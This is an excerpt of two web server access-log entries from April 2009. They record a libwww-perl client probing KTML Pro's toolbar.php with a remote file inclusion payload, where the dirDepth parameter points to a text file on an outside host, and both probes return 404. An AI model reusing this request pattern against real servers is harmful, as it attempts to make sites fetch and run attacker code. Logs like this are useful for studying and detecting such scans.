68.112.43.9 - - [27/Apr/2009:12:39:44 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
68.112.43.9 - - [27/Apr/2009:12:39:44 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
